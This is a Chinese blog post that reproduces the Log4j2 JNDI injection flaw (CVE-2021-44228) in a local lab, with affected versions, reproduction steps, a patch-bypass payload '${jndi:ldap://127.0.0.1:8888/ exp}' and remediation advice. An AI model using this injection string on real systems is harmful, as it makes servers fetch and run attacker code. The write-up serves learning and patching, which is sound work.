漏洞复现 -“核弹”漏洞-Log4j2 JNDI注入(CVE-2021-44228)

最新推荐文章于 2024-08-02 16:59:58 发布
最新推荐文章于 2024-08-02 16:59:58 发布
阅读量958 收藏
点赞数
分类专栏: Web安全 漏洞复现 文章标签: 安全 java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sally717/article/details/124627305
版权

该漏洞被评为“核弹”级别,实在是log4j使用范围太广了,只要写java的,没几个没听过用过log4j吧。

漏洞原理

利用jndi的Lookup功能,实现jndi注入命令执行

影响范围

log4j 2.0-beta9到2.15.0(1.* 版本不受影响)

复现环境

jdk: 1.8.0_181

log4j:2.14.1

OS:Win10

复现步骤

1. 创建一个springboot的工程,验证当前的log4j库是否存在漏洞。

能解析${}表达式的才存在漏洞,官网的log4j库已经修复了,无法解析该表达式,需要找老的库来复现。

 

2. 验证外部传入表达式${}能否解析

3.开启JNDI注入利用工具

设置执行打开计算器的命令,开启后得到rmi和ldap的地址

4.利用jndi注入

官方随后出的补丁版本2.15.0-rc1也是可以绕过继续注入的,绕过方法为带空格的异形URI地址(127.0.0.1:8888/和exp之间):${jndi:ldap://127.0.0.1:8888/ exp}

嗯,补得很好,下次不要再补了

漏洞修复

1. 下载官网最新版的log4j(2.16.0)版本就行了

2. 建议JDK使用6u211、7u201、8u191、11.0.1及以上的版本(网上看到的,本人未验证过)

正好机器上有jdk13,咱是勤劳而严谨的人儿,还是要验证一把

重新建一个jdk13的springboot工程,依然还是同一个log4j库,执行结果如下:

 ${}表达式依然是可以执行的,只是jndi注入无法执行了。嗯,升级jdk是可行的。

本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。

如需转载,请注明出处,这是对他人劳动成果的尊重。

本文与本人博客园的博客是同步的,博客园地址:博客园

Sally__Zhang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码来远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
这个漏洞,被称为CVE-2021-44228,影响了广泛使用的Java日志框架Apache Log4j2,可能导致远程代码执行(RCE)的风险,让攻击者有机会完全控制受影响的系统。本文将深入探讨Log4j2漏洞的原理、影响范围以及如何进行...
Log4j2JNDI注入漏洞CVE-2021-44228)原理分析与思考
jidunkeji的博客
12-24 3013
最近Log4j2JNDI注入漏洞CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。本篇文章即对该漏洞进行复现和分析其形成原理。
Log4j2JNDI注入漏洞原理分析与思考
2401_85763924的博客
06-17 735
通过JNDI,可以将数据库相关的配置在一个支持JNDI服务的容器(通常Tomat等Web容器均支持)中统一完成,并暴露一个简洁的名称,该名称背后绑定着一个 DataSource 对象。再举个更简单的例子,这有点类似DNS提供域名到IP地址的解析服务。可以看到,rc1补丁通过对JNDI Lookup增加白名单的方式,限制默认可以访问的主机为本地IP,限制默认支持的协议类型为 java 、 ldap 、 ldaps ,限制LDAP协议默认可以使用的Java类型为少数基础类型,从而大大减少了默认的攻击面。
核弹漏洞】Apache Log4j2 漏洞复现CVE-2021-44228 )包含源码
blaze_jack
12-12 9561
2021年12月10日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,漏洞编号:CVE-2021-44228,名称:Log4Shell。 由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。关于漏洞的细节想必大家都很感兴趣,我们这边直接用代码来复现漏洞。 log4j cve
[CVE-2021-45105] Apache Log4j2 漏洞复现与原理详细分析
Specif1c的博客
08-10 1712
2021年12月9日,各大公司都被一个核弹漏洞惊醒了,该漏洞一旦被攻击者利用就会造成及其严重的影响。该漏洞甚至被认为可能是“计算机历史上最大的漏洞”。
记Log4j(CVE-2021-44228)核弹漏洞应急响应之旅
jimmyleeee的专栏
12-15 3234
可能大家都知道了Log4j的远程代码执行漏洞CVE-2021-44228),又造成了很多安全运维和开发团队的不眠之夜。下面是参加此次应急响应的过程,简单写下来,以供将来改善。 收到此漏洞之后,公司的团队做了以下紧急安排: 首先,联系Blue Team,根据攻击特征制定相应的防火墙规则,先挡一阵子。事实证明也只能挡一阵子,很快各种绕过就出来了,例如:https://github.com/SecuProject/Pentest-Cheat-Sheet/blob/master/Discovery/HTTP
核弹级“Apache Log4j2远程代码执行漏洞CVE-2021-44228)”复现及原理。
weixin_46263525的博客
04-05 1200
java中最常用的日志框架是log4j2和,Apache Log4j2是一款使用非常广泛的Java日志框架。2021年12月9日,Apache Log4j2爆出存在远程代码执行漏洞,由于Apache Log4j2广泛地应用在各种Web程序中,该漏洞涉及用户量较大,危害性非常之高,漏洞影响版本为2.0~2.14.1。
从Log4j和Fastjson RCE漏洞认识jndi注入
道阻且长,行则将至。
06-10 1274
本文学习了 JNDI 基本概念和 JNDI 注入的基本原理,并通过靶场实践 JNDI 注入漏洞的利用过程,与此同时学习了 Log4j RCE 漏洞CVE-2021-44228)和 Fastjson 反序列化漏洞CVE-2017-18349)的原理,并通过靶场实践借助 JNDI 注入完成 RCE 的过程。
Log4j2注入漏洞CVE-2021-44228
2301_80115097的博客
10-10 57
最近Log4j2JNDI注入漏洞CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。
Web网络安全-----Log4j高危漏洞原理及修复
热门推荐
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
log4j-api-2.12.4.ja和log4j-core-2.12.4.jar
04-27
提到的"避免log4j漏洞问题"可能指的是在2021年出现的严重安全漏洞——CVE-2021-44228,也被称为Log4Shell。这个漏洞允许攻击者通过注入恶意的JNDIJava Naming and Directory Interface)链接来执行远程代码。...
log4j-2.15.0-rc2
12-13
在log4j-2.15.0-rc2中,主要修复了JNDI注入漏洞CVE-2021-44228),这是由于日志配置中的某些特性允许恶意输入触发远程代码执行。此漏洞的影响范围广泛,因此更新至这个修复版本至关重要。开发者应该立即检查他们的...
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 453
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
最新发布
2301_76813281的博客
08-02 419
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 179
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
apache log4j CVE-2021-44228漏洞怎么解决
06-03
Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值